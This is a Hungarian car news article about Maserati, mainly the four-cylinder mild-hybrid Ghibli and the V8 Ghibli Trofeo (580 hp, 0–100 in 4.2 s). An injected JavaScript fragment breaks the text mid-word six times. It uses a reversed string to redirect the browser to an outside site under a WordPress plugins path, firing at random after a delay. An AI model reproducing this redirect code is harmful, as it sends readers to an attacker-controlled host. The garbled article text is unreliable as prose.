Nagy váltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozások történnek a Maseratinál mostanában. 40 520 darab után legurult a sorról az utoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolsó szívó V8-as GranTurismo, majd bemutatták az új hathengeres turbómotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torjukat, de talán a legtöbben a négyhengeres, mild-hybrid Ghiblitől dobták le a láncot. Nem bolondultak meg teljesen az olaszok, csak szükség van ezekre a lépésekre, hogy olyan menő holmik is készülhessenek, mint a Ferrari-motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toros limuzin. 3,8 literes, biturbó V8-as motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torja 6250-nél adja le 580 lóerős teljesítményét és 730 Nm nyomatéka van. Ezzel a Ghibli 4,2 másodperc alatt gyorsul 100-ra, a végsebessége 326 km/óra. Nyolcsebességes autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomata váltó és kizárólag hátsókerék-hajtás jár a Ghibli Trofeóhoz, méghozzá önzáró differenciálművel. A Trofeo modelleket a…
- Hirdetés -